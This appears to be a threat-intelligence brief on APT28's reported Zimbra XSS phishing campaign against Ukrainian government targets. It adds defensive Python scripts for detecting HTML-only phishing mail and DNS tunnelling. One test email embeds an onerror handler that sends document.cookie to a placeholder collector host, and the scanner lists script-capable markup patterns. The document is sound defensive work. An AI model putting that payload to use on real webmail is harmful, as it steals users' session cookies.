APT28 Exploits Zimbra XSS (CVE‑2025‑66376) in Phishing Campaign Targeting Ukrainian Government
What Happened — APT28 (Fancy Bear) sent HTML‑only phishing emails that exploited a stored cross‑site scripting flaw (CVE‑2025‑66376) in Zimbra Collaboration Suite. When a recipient opened the message in a vulnerable Zimbra webmail session, the embedded payload executed remote code, harvested credentials, session tokens, 2FA backup codes and mailbox contents, and exfiltrated the data over DNS and HTTPS.
Why It Matters for TPRM (third‑party risk management) —
- Unpatched Zimbra servers expose third‑party data and credentials, creating a supply‑chain risk for any organization that relies on the platform.
- Credential harvesting can lead to lateral movement into other vendor environments, amplifying breach impact.
- The attack demonstrates that “attachment‑free” phishing can bypass many traditional email defenses.
Who Is Affected — Government agencies, critical infrastructure entities, and any enterprise using Zimbra Collaboration Suite (on‑prem or hosted).
Recommended Actions —
- Verify all Zimbra deployments are patched to the November 2025 release or later.
- Enforce MFA and monitor for anomalous mailbox activity.
- Conduct a rapid inventory of third‑party email services and assess their patch management processes.
- Update email security rules to detect HTML‑only phishing payloads and block suspicious scripts.
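The last recommendation above is the one a mail-gateway team can act on directly. The following script is an added example written for this brief, not tooling from the article or from Zimbra: it parses a raw RFC 822 message with Python's standard `email` package, checks whether the message is HTML‑only (an HTML part and no attachment), and scans every HTML part for active content that has no business in a mail body: `<script>`, `<iframe>`, `<object>` and `<embed>` elements, `on*` event‑handler attributes, and `javascript:`/`vbscript:`/`data:` URIs. Both sample messages are constructed for the demonstration; the collector hostname and the message contents are placeholders, not indicators from the campaign.

```python
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample: HTML-only message carrying an event-handler payload.
# The hostname and body are placeholders, not indicators from the campaign.
SAMPLE_SCRIPT_EML = """\
From: notices@sender.example.invalid
To: analyst@victim.example.invalid
Subject: Document review request
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Please review the attached policy update.</p>
<img src="x" onerror="fetch('https://collector.example.invalid/?c='+document.cookie)">
</body></html>
"""

# Constructed sample: ordinary HTML newsletter with a plain link and no scripts.
SAMPLE_BENIGN_EML = """\
From: news@sender.example.invalid
To: analyst@victim.example.invalid
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>This week's summary is online.</p>
<p><a href="https://www.sender.example.invalid/digest">Read more</a></p>
</body></html>
"""

ACTIVE_ELEMENTS = {"script", "iframe", "object", "embed"}
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.I)       # onerror, onload, onclick, ...
SCRIPT_URI = re.compile(r"^\s*(javascript|vbscript|data):", re.I)


class ActiveContentScanner(HTMLParser):
    """Collects a finding for every element or attribute that can run script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in ACTIVE_ELEMENTS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if EVENT_HANDLER.match(name):
                self.findings.append(f"{name} handler on <{tag}>")
            if value and SCRIPT_URI.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                self.findings.append(f"{name} uses {scheme}: URI on <{tag}>")


def scan_message(raw: str) -> dict:
    """Return html_only flag, active-content findings and a gateway verdict."""
    msg = email.message_from_string(raw, policy=policy.default)
    parts = list(msg.walk())  # a single-part message walks itself
    has_attachment = any(p.get_content_disposition() == "attachment" for p in parts)
    html_parts = [p for p in parts if p.get_content_type() == "text/html"]

    findings = []
    for part in html_parts:
        scanner = ActiveContentScanner()
        scanner.feed(part.get_content())  # decoded str under policy.default
        findings.extend(scanner.findings)

    html_only = bool(html_parts) and not has_attachment
    # Quarantine only when the HTML-only shape and active content coincide;
    # plain newsletters with links are allowed through.
    verdict = "quarantine" if (html_only and findings) else "allow"
    return {"html_only": html_only, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for label, raw in (("script", SAMPLE_SCRIPT_EML), ("benign", SAMPLE_BENIGN_EML)):
        print(label, scan_message(raw))
```

The verdict deliberately keys on the combination the brief describes (HTML part present, nothing attached, script-capable markup in the body) rather than on any one element, so a mail with an `<a href>` alone still passes. In production the same scan should also run over HTML inside `multipart/alternative` bodies and over `text/html` parts nested in forwarded messages, which `msg.walk()` already visits.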
Technical Notes — CVE‑2025‑66376 is a stored XSS that enables unauthenticated remote code execution. The exploit chain lives entirely within the email body; no attachments or links are present. Harvested data includes credentials, session tokens, backup 2FA codes, and up to 90 days of mailbox content, exfiltrated over DNS and HTTPS.
Source: BleepingComputer
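Because the notes above name DNS as one exfiltration channel, a resolver-log heuristic is the natural detection to pair with the mail-gateway scan. The script below is an added example for this brief, not code from the article: it groups DNS queries by base domain and flags a domain when many distinct names under it carry long, high‑entropy leftmost labels, which is how data is smuggled through query names. The log lines are constructed, the domains are placeholders, the "last two labels" base-domain rule is a simplifying assumption (a real deployment would use a public-suffix list), and the thresholds are starting points to tune against your own baseline.

```python
import math
from collections import defaultdict

# Constructed resolver log (timestamp, client, qtype, qname); not real data.
DNS_LOG = """\
2025-11-20T10:00:01Z 10.0.0.5 A www.example.invalid
2025-11-20T10:00:02Z 10.0.0.5 A mail.example.invalid
2025-11-20T10:00:03Z 10.0.0.5 A www.example.invalid
2025-11-20T10:00:04Z 10.0.0.5 A calendar.example.invalid
2025-11-20T10:00:05Z 10.0.0.5 TXT 5a7d3c9e1f2b4a6c8d0e.c0.example-tunnel.invalid
2025-11-20T10:00:05Z 10.0.0.5 TXT 0f1e2d3c4b5a69788796.c1.example-tunnel.invalid
2025-11-20T10:00:06Z 10.0.0.5 TXT a1b2c3d4e5f60718293a.c2.example-tunnel.invalid
2025-11-20T10:00:06Z 10.0.0.5 TXT 9e8d7c6b5a4f3e2d1c0b.c3.example-tunnel.invalid
2025-11-20T10:00:07Z 10.0.0.5 TXT 13579bdf02468ace1357.c4.example-tunnel.invalid
2025-11-20T10:00:07Z 10.0.0.5 TXT fedcba9876543210fedc.c5.example-tunnel.invalid
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded data approaches 4.0, words sit near 2-3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def base_domain(qname: str) -> str:
    # Assumption: registrable domain = last two labels. Use a public-suffix
    # list in production so names like example.co.uk group correctly.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def analyse_dns_log(log: str, min_unique=5, min_label_len=16, min_entropy=3.3) -> dict:
    """Per base domain: unique names, mean leftmost-label length/entropy, flag."""
    per_domain = defaultdict(lambda: {"names": set(), "lens": [], "ents": []})
    for line in log.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines rather than failing the whole run
        qname = fields[3].rstrip(".").lower()
        leftmost = qname.split(".")[0]
        rec = per_domain[base_domain(qname)]
        rec["names"].add(qname)
        rec["lens"].append(len(leftmost))
        rec["ents"].append(shannon_entropy(leftmost))

    report = {}
    for domain, rec in per_domain.items():
        unique = len(rec["names"])
        mean_len = sum(rec["lens"]) / len(rec["lens"])
        mean_ent = sum(rec["ents"]) / len(rec["ents"])
        # All three conditions must hold: volume of distinct names, label
        # length (payload capacity) and entropy (encoded rather than wordlike).
        flagged = unique >= min_unique and mean_len >= min_label_len and mean_ent >= min_entropy
        report[domain] = {
            "unique_names": unique,
            "mean_label_len": round(mean_len, 2),
            "mean_entropy": round(mean_ent, 2),
            "label_bytes_total": sum(rec["lens"]),  # rough upper bound on smuggled data
            "flagged": flagged,
        }
    return report


def flagged_domains(log: str) -> list:
    return sorted(d for d, s in analyse_dns_log(log).items() if s["flagged"])


if __name__ == "__main__":
    for domain, stats in analyse_dns_log(DNS_LOG).items():
        print(domain, stats)
```

Run against a day of resolver logs, the `label_bytes_total` column gives a quick sense of how much could have left over the flagged domain, which is useful when scoping the "up to 90 days of mailbox content" figure in the notes. Pair it with egress logs for the HTTPS leg, where the equivalent signal is many small requests to a newly seen host from the webmail client's IP range.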